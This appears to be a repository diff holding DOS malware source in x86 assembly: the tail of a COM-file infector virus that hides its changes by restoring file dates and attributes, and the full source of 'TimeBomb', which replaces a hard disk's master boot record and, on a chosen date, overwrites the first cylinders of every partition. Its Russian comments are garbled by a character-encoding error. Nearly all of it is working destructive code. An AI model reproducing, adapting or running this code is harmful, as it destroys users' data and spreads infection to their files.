MOV CX,3 ; bytes to the file. These
|
||||
MOV DX,SI ; bytes contain the JMP
|
||||
ADD DX,0DH ; instruction to the virus.
|
||||
INT 21H ;
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set File-Time/Date back ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Set_FileDate_Time_Back:
|
||||
MOV DX,[SI+6] ; Get File-Date
|
||||
MOV CX,[SI+4] ; Get File-Time
|
||||
MOV AX,5701H ; Set back the File-Time and
|
||||
INT 21H ; Date stamps
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Close the File ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
MOV AH,3EH ;
|
||||
INT 21H ; Close the File
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Set File Attribute back ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
Set_FileAttributes_Back:
|
||||
MOV AX,4301H ;
|
||||
MOV CX,[SI+8] ; Get File Attribute
|
||||
MOV DX,26H ;
|
||||
ADD DX,SI ;
|
||||
INT 21H ; Set File Attribute
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Restore Org DTA address ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
Restore_Org_DTA:
|
||||
PUSH DS
|
||||
MOV AH,1AH
|
||||
MOV DX,[SI] ; Get Original DTA
|
||||
MOV DS,[SI+2] ; address
|
||||
INT 21H ; St DTA to ds:dx
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Put 3 Original 1st three bytes in place and execute original program ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
POP DS ; Restore DS
|
||||
PUSH SI ; Store SI
|
||||
CLD ;
|
||||
ADD SI,81H ; Address where the 1st three
|
||||
; bytes can be found.
|
||||
MOV DI,100H ; Destination Address
|
||||
MOV CX,3 ; Number of bytes to move
|
||||
REP MOVSB ; Move the bytes
|
||||
POP SI ; Restore SI
|
||||
POP CX ; Restore CX
|
||||
XOR AX,AX ; Zero register
|
||||
XOR BX,BX ; Zero register
|
||||
XOR DX,DX ; Zero register
|
||||
XOR SI,SI ; Zero register
|
||||
MOV DI,100H
|
||||
PUSH DI ; Store DI
|
||||
XOR DI,DI ; Zero register
|
||||
RET 0FFFFH ; Terminate Virus-Code and
|
||||
; execute original program.
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Virus Data Area ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
|
||||
ORG_DTA_ADD: DW ? ; Storing place for BX of
|
||||
; original DTA
|
||||
DW ? ; Storing place for ES of
|
||||
; original DTA
|
||||
File_Time: DW ? ; Storing place for the
|
||||
; filetime of the file
|
||||
Date: DW ? ; Storing place for the
|
||||
; filedate
|
||||
Attrib: DW ? ; Storing place for the
|
||||
; file attributes.
|
||||
|
||||
Three_Bytes: DB 0E9h, 27h, 03h
|
||||
|
||||
First_New_Byte: DB 0E9h ; First new byte of the
|
||||
; the infected file. This is
|
||||
; the jump instruction.
|
||||
Length_Min_3: DB 0Dh, 27h ; Also new address to jump
|
||||
; to for the virus on exe-
|
||||
; cution, 2nd and 3rd new byte
|
||||
|
||||
Search_Spec: DB '*.COM',00h
|
||||
|
||||
Path_Add_Org: DW 00,05
|
||||
|
||||
Path_Add_Vir: DW '6M'
|
||||
|
||||
DB 'PATH=', 00, 00
|
||||
|
||||
Destruc_Code_1: DB 0B4h, 0h, 0CDh, 20h, 90h
|
||||
|
||||
File_Path: DB 'VIRCOM.COM' ; Filename including PATH
|
||||
DB 30 DUP(0)
|
||||
|
||||
New_DTA:
|
||||
DB 02
|
||||
DB '????????COM'
|
||||
DB 03, 11H
|
||||
DB 7 DUP (0)
|
||||
DB 20H, 80H, 12H, 17H, 15H, 10H
|
||||
DB 27H, 0, 0
|
||||
|
||||
FileName: DB 'VIRCOM.COM', 00h, 00h, 00h
|
||||
|
||||
Destruc_Code_2: DB 0F4H, 0F4H, 0F4H, 0F4H
|
||||
|
||||
Destruc_Code_3: DB 0CDH, 19H, 0CDH, 19H, 0E9H
|
||||
|
||||
First_3_Bytes: DB 0E9h, 45h, 45h
|
||||
|
||||
Notice: DB '(C) Monxla'
|
||||
|
||||
Time ENDP
|
||||
|
||||
SEG_A ENDS
|
||||
|
||||
|
||||
|
||||
END START
|
||||
|
|
@ -0,0 +1,472 @@
|
|||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
; (C) ANS (Armourer) TimeBomb Ver 1.00 25 Jun
|
||||
; FIDOnet 2:461/29.444 FreeWare, SourceWare 1995
|
||||
;
|
||||
;
|
||||
; <20>®«®áâìî § ¬¥ï¥â MBR. <20>® ¤®á⨦¥¨¨ ®¯à¥¤¥«¥®© ¤ âë ä â «ì® £à®å ¥â ¢¨â
|
||||
;
|
||||
; ‘â àë© MBR § ¯¨áë¢ ¥âáï ¢ ä ©« c:\mbr.bak, çâ®¡ë ¬®¦® ¡ë«® ¢®ááâ ®¢¨âì,
|
||||
; ¥á«¨ çâ®. “¯à ¢«¥¨ï áâ àë© MBR ¥ ¯®«ãç ¥â, â ª çâ® ¥á«¨ ® ¤¥« « çâ®-â®
|
||||
; ¡®«¥¥ 㬮¥, ¥¦¥«¨ § £à㧪 á¨á⥬ë á ªâ¨¢®£® à §¤¥« - TimeBomb ¯à¨¤¥âáï
|
||||
; ¯¥à¥¤¥« âì.
|
||||
;
|
||||
; <20>ਠáà ¡ âë¢ ¨¨ TimeBomb § â¨à îâáï ¯¥à¢ë¥ 4 樫¨¤à ª ¦¤®£® à §¤¥«
|
||||
; ¢¨â¥, ¢ª«îç ï «®£¨ç¥áª¨¥ ¤¨áª¨ DOS (extended partition)
|
||||
;
|
||||
; ‘«¥¤ã¥â § ¬¥â¨âì, çâ® Non-DOS à §¤¥«ë (HPFS, ¯à¨¬¥à) ¯à¨ í⮬ ¯®áâà ¤ îâ
|
||||
; ¥§ ç¨â¥«ì® - ¢ á¢ï§¨ á ª®à¥ë¬ ®â«¨ç¨¥¬ ¨å áâàãªâãàë ®â DOS FAT.
|
||||
;
|
||||
killed_cyl = 4 ; —¨á«® 㡨¢ ¥¬ëå 樫¨¤à®¢ ¢ ª ¦¤®¬ à §¤¥«¥
|
||||
xor_value = 73h ; ‡ 票¥ § è¨ä஢ ¨ï ‚ 襣® ¯®á«¥¤¥£® á«®¢ ;-)
|
||||
|
||||
locals
|
||||
cseg segment
|
||||
assume cs:cseg
|
||||
org 100h
|
||||
.286
|
||||
start proc near
|
||||
;
|
||||
; ˆáâ ««ïæ¨ï
|
||||
;
|
||||
; <20>஢¥à塞 ª®¬ ¤ãî áâபã
|
||||
mov si, 80h
|
||||
mov bl, byte ptr [si]
|
||||
xor bh, bh
|
||||
cmp bl, 8
|
||||
jnc @@checkdate
|
||||
|
||||
|
||||
help:
|
||||
; ‚ ª®¬ ¤®© áâப¥ ¥ 㪠§ ¤ â - ¢ë¢®¤¨¬ ¯®¤áª §ªã
|
||||
mov dx, offset @@title
|
||||
mov ah, 9
|
||||
int 21h
|
||||
int 20h
|
||||
|
||||
|
||||
; <20>®«ã票¥ BCD-ç¨á« ¨§ ª®¬. áâப¨
|
||||
getBCD proc near
|
||||
dec si
|
||||
mov ax, word ptr [si+bx] ; <20>¥à¥¬ ¯®á«¥¤¨¥ ¤¢¥ æ¨äàë
|
||||
sub ax, '00' ; ASCII -> BIN
|
||||
xchg al, ah
|
||||
db 0d5h, 10h ; AAD á ¬®¤¨ä¨ª â®à®¬ 16
|
||||
cmp al, 9ah
|
||||
jnc help
|
||||
dec si ; ‘à §ã ¯¥à¥å®¤¨¬ ª á«¥¤ãî饬㠯®«î
|
||||
dec si
|
||||
retn
|
||||
getBCD endp
|
||||
|
||||
|
||||
@@checkdate: ; <20>஢¥à塞 ¤ âã (á ç « £®¤, § ⥬ ¬¥áïæ, § ⥬ ç¨á«®)
|
||||
; ¨ ¯à¨¢®¤¨¬ ¥¥ ª 㦮¬ã ä®à¬ âã
|
||||
; Š®à४â®áâì ¤ âë ¥ ¯à®¢¥à塞 - ¦â® ¯à®¡«¥¬ ¯®«ì§®¢ ⥫ï -
|
||||
; çâ® ® â ¬ ¢¢¥«
|
||||
call getBCD ; <20>¥à¥¬ æ¨äàë £®¤
|
||||
mov byte ptr year, al ; <20>®«ã稫¨ BCD-year
|
||||
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
|
||||
jne help
|
||||
call getBCD ; <20>¥à¥¬ æ¨äàë ¬¥áïæ
|
||||
mov byte ptr month, al ; <20>®«ã稫¨ BCD-month
|
||||
cmp byte ptr [bx+si+1], '.' ; <20>஢¥à塞 à §¤¥«¨â¥«ì
|
||||
jne help
|
||||
call getBCD ; <20>¥à¥¬ æ¨äàë ¤ï
|
||||
mov byte ptr day, al ; <20>®«ã稫¨ BCD-day
|
||||
|
||||
|
||||
@@singledisk:
|
||||
;
|
||||
; ‡ ¬¥ï¥¬ MBR ¢¨â ᢮¨¬ ª®¤®¬ ¨§ bomb proc
|
||||
;
|
||||
; —¨â ¥¬ áâ àë© MBR, á®åà 塞 ¥£® ¢ c:\mbr.bak, ¯¨è¥¬ ᥡï
|
||||
;
|
||||
; —¨â ¥¬ MBR
|
||||
mov cx, 1
|
||||
mov dx, 80h
|
||||
mov ax, 201h
|
||||
mov bx, offset buffer
|
||||
int 13h
|
||||
jnc @@rd_ok
|
||||
|
||||
mov dx, offset @@rd_err
|
||||
|
||||
@@err_exit: ; ‚뢮¤ á®®¡é¥¨ï ¨§ DX ¨ ¢ë«¥â ¯® ®è¨¡ª¥
|
||||
mov ah, 9
|
||||
int 21h
|
||||
retn
|
||||
|
||||
@@rd_ok:
|
||||
; ‘®§¤ ¥¬ ä ©«
|
||||
mov dx, offset @@fname
|
||||
xor cx, cx
|
||||
mov ah, 3ch
|
||||
int 21h
|
||||
jnc @@cr_ok
|
||||
|
||||
mov dx, offset @@cr_err
|
||||
jmp @@err_exit
|
||||
|
||||
@@cr_ok:
|
||||
; <20>¨è¥¬ ¢ ä ©«
|
||||
mov bx, ax
|
||||
mov cx, 512
|
||||
mov dx, offset buffer
|
||||
mov ah, 40h
|
||||
int 21h
|
||||
jnc @@wr_ok
|
||||
|
||||
mov dx, offset @@wr_err
|
||||
jmp @@err_exit
|
||||
|
||||
@@wr_ok:
|
||||
; ‡ ªàë¢ ¥¬ ä ©«
|
||||
mov ah, 3eh
|
||||
int 21h
|
||||
|
||||
;
|
||||
; <20>¥à¥®á¨¬ ᢮© MBR ¬¥áâ® áâ ண®
|
||||
;
|
||||
mov si, offset bomb
|
||||
mov di, offset buffer
|
||||
mov bx, di
|
||||
mov cx, di
|
||||
sub cx, si
|
||||
cld
|
||||
rep movsb
|
||||
|
||||
;
|
||||
; ‡ ¯¨áë¢ ¥¬ ®¢ë© MBR ¯®¢¥àå áâ ண®
|
||||
;
|
||||
mov cx, 1
|
||||
mov dx, 80h
|
||||
mov ax, 301h
|
||||
int 13h
|
||||
|
||||
mov dx, offset @@mbr_wr_err
|
||||
jc @@err_exit
|
||||
|
||||
mov dx, offset @@done_msg
|
||||
jmp @@err_exit
|
||||
|
||||
|
||||
; ‘®®¡é¥¨ï ®¡ ®è¨¡ª å
|
||||
@@rd_err: db 'Error read the MBR of C:',13,10,'$'
|
||||
@@cr_err: db 'Error creating the '
|
||||
@@fname: db 'C:\MBR.BAK',0,'file',13,10,'$'
|
||||
@@wr_err: db 'Error writing backup file',13,10,'$'
|
||||
@@mbr_wr_err: db 'Error writing new MBR',13,10,'$'
|
||||
@@done_msg: db 'Your MBR replaced by TimeBomb',13,10,'$'
|
||||
|
||||
|
||||
; ‡ áâ ¢ª
|
||||
@@title:
|
||||
db 13,10,10
|
||||
db '(C) Armourer TimeBomb Ver 1.00 25 Jun 1995',13,10,10
|
||||
db ' Usage: timebomb <date>',13,10,10
|
||||
db ' Where <date> is a fatal date for your computer.',13,10
|
||||
db ' Date format must be in exUSSR standard: DD.MM.YY',13,10,10
|
||||
db 'Good Luck ;)',13,10,'$'
|
||||
|
||||
start endp
|
||||
|
||||
|
||||
|
||||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||||
; ’¥ªáâ ¡®¬¡ë. Š®¬¡¨¨àã¥âáï á MBR (®â MBR ¡¥à¥âáï ¯ àâ¨è)
|
||||
;
|
||||
; <20>â®â ª®¤ ¡ã¤¥â áâ à⮢ âì á ¤à¥á 0:7c00h
|
||||
;
|
||||
bomb proc near
|
||||
|
||||
; <20> áâà ¨¢ ¥¬ á⥪ ¨ ¯¥à¥®á¨¬ MBR, ªã¤ ¤® (0:600h)
|
||||
cli
|
||||
mov ax, cs
|
||||
mov ss, ax
|
||||
mov ds, ax
|
||||
mov es, ax
|
||||
mov si, 7c00h
|
||||
mov sp, si
|
||||
push si ; <20>⮠㦮 ¤«ï ¯®á«¥¤ãî饣® áâ àâ boot'
|
||||
cld
|
||||
mov cx, 1beh / 2 ; <20>®á«¥ â ª®£® ¯¥à¥®á SI ¡ã¤¥â 㪠§ë¢ âì
|
||||
mov di, 600h ; ¯ àâ¨è
|
||||
rep movsw
|
||||
|
||||
push ax ; ‘¥£¬¥â
|
||||
push offset beginbomb - offset bomb + 600h ; ‘¬¥é¥¨¥
|
||||
retf
|
||||
|
||||
|
||||
beginbomb:
|
||||
; <20>஢¥à塞 ¢à¥¬ï
|
||||
mov ah, 4
|
||||
int 1ah ; <20>à®ç«¨ ¤ âã ¢ CX:DX
|
||||
jc @@skipbomb ; …᫨ ç áë ¥ à ¡®â îâ -> ¯à®¯ã᪠¥¬ ¯à®¢¥àªã
|
||||
|
||||
year = $ + 2
|
||||
cmp cl, 12h ; <20>஢¥à塞 £®¤
|
||||
jc @@skipbomb ; ƒ®¤ ¥ ᮢ¯ « ;)
|
||||
jne @@explode ; …᫨ íâ®â £®¤ ¯à®è¥« - ¢§àë¢ ¥¬áï ¬¥¤«¥®
|
||||
|
||||
month = $ + 3
|
||||
day = $ + 2
|
||||
cmp dx, 1234h ; ˆ¬¥® â ª, çâ®¡ë ¥ ᣥ¥à¨à®¢ «áï
|
||||
; ª®à®âª¨© ¢ ਠ⠤«ï CMP
|
||||
jc @@skipbomb ; <20>¥ ᮢ¯ « ¤¥ì ¨ ¬¥áïæ
|
||||
|
||||
|
||||
@@explode:
|
||||
;
|
||||
; ‚ᥠᮢ¯ «®, ¯à¨è« ç¥à ï ¯®à ...
|
||||
;
|
||||
; ‘â¨à ¥¬ ¯¥à¢ë¥ 樫¨¤àë ª ¦¤®£® à §¤¥« (¢ª«îç ï «®£¨ç¥áª¨¥
|
||||
; ¤¨áª¨ DOS)
|
||||
;
|
||||
; “áâ ¢«¨¢ ¥¬ ¢ ª®¤¥ ¡®¬¡ë ¯ à ¬¥âàë ¢¨â
|
||||
mov dl, 80h
|
||||
call destroy
|
||||
|
||||
; “áâ ¢«¨¢ ¥¬ ¯ à ¬¥âàë â®à®£® ¢¨â , ¥á«¨ ® ¥áâì
|
||||
ror dl, 1 ; …᫨ ®¤¨ ¤¨áª, ä« £ CF ¡ã¤¥â ãáâ ®¢«¥
|
||||
jc @@singledisk
|
||||
|
||||
mov dl, 81h
|
||||
call destroy
|
||||
|
||||
@@singledisk:
|
||||
jmp @@incorrect ; ‚뢮¤¨¬ á®®¡é¥¨¥ "Missing operating ssytem"
|
||||
|
||||
|
||||
@@skipbomb:
|
||||
;
|
||||
; Žâà ¡®âª ®à¬ «ì®£® ª®¤ MBR
|
||||
;
|
||||
; ˆé¥¬ § £à㧮çë© à §¤¥«
|
||||
mov cl, 4 ; …áâì ¢á¥£® 4 ¢ ਠâ ...
|
||||
|
||||
@@searchboot: ; –¨ª« ¯®¨áª
|
||||
mov dx, word ptr [si] ; ‘à §ã § £à㦠¥¬ ¢ DX â®, ç⮠㦮
|
||||
cmp dl, 80h ; <20>â®â à §¤¥« § £à㧮çë© ?
|
||||
je @@boot
|
||||
|
||||
add si, 10h ; <20>¥à¥å®¤¨¬ ª á«¥¤ãî饩 § ¯¨á¨
|
||||
loop @@searchboot
|
||||
|
||||
; <20>¥ 諨 - ¢ë¤ ¥¬ á®®¡é¥¨¥
|
||||
@@incorrect:
|
||||
call errmsg
|
||||
db 'Missing operating system',0
|
||||
|
||||
|
||||
@@boot: ; ‡ £à㦠¥¬ boot-ᥪâ®à ¨ ¯¥à¥¤ ¥¬ ¥¬ã ã¯à ¢«¥¨¥
|
||||
mov cx, word ptr [si+2] ; —â® ¤® - ¢ CX
|
||||
mov ax, 201h ; —¨â ¥¬ 1 ᥪâ®à
|
||||
pop bx ; <20>® ¤à¥áã 0:7c00h
|
||||
push bx
|
||||
int 13h
|
||||
jnc @@exit
|
||||
|
||||
call errmsg
|
||||
db 'Error reading operating system',0
|
||||
|
||||
@@exit:
|
||||
cmp word ptr [bx + 510], 0aa55h
|
||||
jne @@incorrect
|
||||
retn ; ‡ ¯ã᪠¥¬ boot
|
||||
|
||||
;
|
||||
; <09>®¤¯à®£à ¬¬ë
|
||||
;
|
||||
|
||||
; ‚ë¤ ç á®®¡é¥¨ï ®¡ ®è¨¡ª¥
|
||||
errmsg proc near
|
||||
sti
|
||||
cld
|
||||
pop si
|
||||
mov ah, 0eh
|
||||
@@nextchar:
|
||||
lodsb
|
||||
or al, al
|
||||
je $
|
||||
int 10h
|
||||
jmp @@nextchar
|
||||
errmsg endp
|
||||
|
||||
|
||||
; Ž¡å®¤ ¢á¥å à §¤¥«®¢ ¤¨áª á § ¯¨áìî ¨å ¯ à ¬¥â஢ ¢ ¡ãä¥à
|
||||
getpart proc near
|
||||
; <20>⮠४ãàᨢ ï äãªæ¨ï.
|
||||
; <20> ¢å®¤¥ ¢ SI âॡã¥âáï 㪠§ â¥«ì ®ç¥à¥¤®© à §¤¥«
|
||||
; ‚ ¡ãä¥à ¯® ¤à¥áã ES:DI ¯¨èãâáï ¯ à ¬¥âàë ⥪.à §¤¥«
|
||||
|
||||
mov cx, 4 ; ‘ç¥â稪 à §¤¥«®¢ ¢ ª ¦¤®¬ MBR
|
||||
|
||||
@@nextpart:
|
||||
; <20>஢¥à塞 ⨯ à §¤¥«
|
||||
cmp byte ptr [si+4], 0 ; <20>¥¨á¯®«ì§ã¥¬ë© à §¤¥«
|
||||
je @@exit
|
||||
|
||||
; <20>¨è¥¬ ¢ ¡ãä¥à ¯ à ¬¥âàë à §¤¥«
|
||||
mov ax, word ptr [si] ; ƒ®«®¢
|
||||
stosw
|
||||
mov dx, ax ; ƒ®â®¢¨¬áï ª® ¢å®¤ã ¢ ४ãàá¨î
|
||||
|
||||
disk1 = $ + 1
|
||||
mov dl, 80h ; <20>®¬¥à ®¡à ¡ âë¢ ¥¬®£® ¤¨áª
|
||||
|
||||
mov ax, word ptr [si+2]
|
||||
stosw ; –¨«¨¤à/ᥪâ®à
|
||||
|
||||
; ‘®¢ ¯à®¢¥à塞 ⨯ à §¤¥« - ¥ à áè¨à¥ë© «¨ ® ?
|
||||
cmp byte ptr [si+4], 5
|
||||
jne @@exit ; <20>¥â - ¨¤¥¬ ¤ «ìè¥
|
||||
|
||||
; <20>ëà塞 ¢ ४ãàá¨î
|
||||
; —¨â ¥¬ MBR à áè¨à¥®£® à §¤¥«
|
||||
push cx ; ‘®åà 塞 áç¥â稪
|
||||
push si ; ‘®åà 塞 㪠§ ⥫ì à §¤¥«ë
|
||||
add bx, 512 ; <20>த¢¨£ ¥¬ 㪠§ â¥«ì ¡ãä¥à
|
||||
mov cx, ax ; ‘¥©ç á CX:DX 㪠§ë¢ îâ MBR
|
||||
mov ax, 201h ; à áè¨à¥®£® à §¤¥«
|
||||
int 13h ; —¨â ¥¬ à áè¨à¥ë© à §¤¥« ¢ 0:BX
|
||||
jnc @@rec ; <20>஢¥àª ª®à४â®áâì
|
||||
|
||||
; ‚ë室¨¬ ¨§ ४ãàᨨ ¢ á«ãç ¥ á¡®ï
|
||||
pop si
|
||||
pop cx
|
||||
sub bx, 512
|
||||
jmp @@exit
|
||||
|
||||
@@rec:
|
||||
mov si, bx ; “áâ ¢«¨¢ ¥¬ 㪠§ ⥫ì
|
||||
add si, 1beh ; â ¡«¨æã à §¤¥«®¢
|
||||
call getpart
|
||||
|
||||
|
||||
@@exit:
|
||||
add si, 10h
|
||||
loop @@nextpart
|
||||
|
||||
; ‚ë室 ¨§ ४ãàᨨ
|
||||
sub bx, 512
|
||||
pop dx
|
||||
pop si
|
||||
pop cx
|
||||
push dx
|
||||
retn
|
||||
|
||||
getpart endp
|
||||
|
||||
|
||||
; “¨ç⮦¥¨¥ ᮤ¥à¦¨¬®£® ⥪ã饣® ¤¨áª
|
||||
destroy proc near
|
||||
|
||||
; <20>®«ãç ¥¬ ¯ à ¬¥âàë ¢¨â , 㪠§ ®£® ¢ DL
|
||||
mov byte ptr ds:[offset disk - offset bomb + 600h], dl
|
||||
mov byte ptr ds:[offset disk1 - offset bomb + 600h], dl
|
||||
mov ah, 8
|
||||
int 13h
|
||||
mov byte ptr ds:[heads - offset bomb + 600h], dh
|
||||
and cl, 63
|
||||
mov byte ptr ds:[sectors - offset bomb + 600h], cl
|
||||
push dx
|
||||
|
||||
mov bx, 0a00h ; <20>ãä¥à ¤«ï ç⥨ï MBR à áè¨à¥ëå à §¤¥«®¢
|
||||
; <20>® 室㠤¥« ª BX ¡ã¤¥â ¯à¨¡ ¢«ïâìáï ¯® 512 -
|
||||
; â ª çâ® ¬ ªá¨¬ «ìë© ã஢¥ì ¢«®¦¥®áâ¨
|
||||
; á®áâ ¢¨â 57 à §¤¥«®¢
|
||||
mov di, 500h ; <20>ãä¥à ¯®¤ ¯ à ¬¥âàë ¤«ï int 13h (64 ¤¨áª )
|
||||
|
||||
; <20>¥ªãàᨢ® ®¡å®¤¨¬ «®£¨ç¥áª¨¥ ¤¨áª¨, § ¯¨áë¢ ï ¢ ¡ãä¥à ¯ à ¬¥âàë
|
||||
; ¤«ï int 13h
|
||||
push si ; Š®à४âë© ¢å®¤ ¢ ४ãàá¨î
|
||||
push cx
|
||||
|
||||
xor ax, ax ; “áâ ®¢ª ¤«ï áâ¨à ¨ï £« ¢®£® MBR
|
||||
stosw
|
||||
inc ax
|
||||
stosw
|
||||
|
||||
call getpart ; Ž¡å®¤ à §¤¥«®¢
|
||||
|
||||
|
||||
; ‘®§¤ ¥¬ § 票¥ ¯à®¯¨áë¢ ¨ï
|
||||
; ‘¥©ç á ¢ bx «¥¦¨â ¤«¨ ¯à®¯¨áë¢ ¥¬ëå ¤ ëå ¢ ¯ à £à ä å - 800h
|
||||
push di ; ‘®åà 塞 㪠§ ⥫ì 墮áâ ᯨ᪠¯ à ¬¥â஢
|
||||
mov di, bx ; ‚ DI ¡ã¤¥â 㪠§ â¥«ì ¡ãä¥à ¤«ï ¤ ëå
|
||||
shl di, 4 ; <20>ãä¥à ¡ã¤¥â à ᯮ« £ âìáï ᮠᬥ饨ï 8000h
|
||||
push di ; ‘®åà 塞 ¤à¥á ¡ãä¥à § ¯®«¥¨ï
|
||||
|
||||
@@nextword:
|
||||
mov si, offset lmd - offset bomb + 600h
|
||||
mov cx, 16
|
||||
@@nextchar:
|
||||
lodsb
|
||||
xor al, xor_value
|
||||
stosb
|
||||
loop @@nextchar
|
||||
dec bx
|
||||
jne @@nextword
|
||||
|
||||
|
||||
; ˆ¤¥¬ § ¤ ¯® ¡ãä¥àã
|
||||
pop bx ; ‚®ááâ ¢«¨¢ ¥¬ ¤à¥á ¡ãä¥à
|
||||
pop si ; ‚®ááâ ¢«¨¢ ¥¬ 㪠§ â¥«ì ¯ à ¬¥âàë
|
||||
mov cx, si ; ‚ëç¨á«ï¥¬ ç¨á«® § â¨à ¥¬ëå à §¤¥«®¢
|
||||
sub cx, 500h
|
||||
shr cx, 2
|
||||
|
||||
std
|
||||
lodsw ; <20>¥à¥å®¤¨¬ ª ¯®á«¥¤¥© § ¯¨á¨ ¢ ¡ãä¥à¥
|
||||
|
||||
|
||||
@@nextpart:
|
||||
push cx ; ‘®åà 塞 áç¥â稪
|
||||
|
||||
lodsw ; <20>¥à¥¬ ¯ à ¬¥âàë à §¤¥«
|
||||
mov cx, ax ; –¨«¨¤à/ᥪâ®à
|
||||
lodsw
|
||||
mov dx, ax ; ƒ®«®¢
|
||||
|
||||
disk = $ + 1
|
||||
mov dl, 80h ; <20>®¬¥à § â¨à ¥¬®£® ¤¨áª
|
||||
|
||||
mov si, killed_cyl ; ‘ç¥â稪 㡨¢ ¥¬ëå 樫¨¤à®¢
|
||||
|
||||
; <20>ய¨áë¢ ¥¬ à §¤¥«
|
||||
@@nexthead:
|
||||
sectors = $ + 1
|
||||
mov ax, 310h ; !!!!
|
||||
int 13h
|
||||
inc dh ; ‘«¥¤ãîé ï £®«®¢
|
||||
|
||||
heads = $ + 2
|
||||
cmp dh, 16 ; ‚¥áì 樫¨¤à ?
|
||||
jne @@nexthead
|
||||
|
||||
add cx, 64 ; ‘«¥¤ãî騩 樫¨¤à
|
||||
xor dh, dh ; <20> ç¨ ¥¬ á ã«¥¢®© £®«®¢ë
|
||||
dec si
|
||||
jne @@nexthead
|
||||
|
||||
pop cx ; ‚®ááâ ¢«¨¢ ¥¬ áç¥â稪
|
||||
loop @@nextpart ; ¨ ªàã⨬ 横« ¯® à §¤¥« ¬
|
||||
|
||||
pop dx
|
||||
retn
|
||||
destroy endp
|
||||
|
||||
|
||||
lmd:
|
||||
irpc ch, <LAMERS MUST DIE.>
|
||||
db '&ch' xor xor_value
|
||||
endm
|
||||
|
||||
bomb endp
|
||||
|
||||
|
||||
buffer: ; ‘î¤ ¡ã¤¥¬ ç¨â âì áâ àë© mbr
|
||||
dw offset buffer - offset bomb
|
||||
cseg ends
|
||||
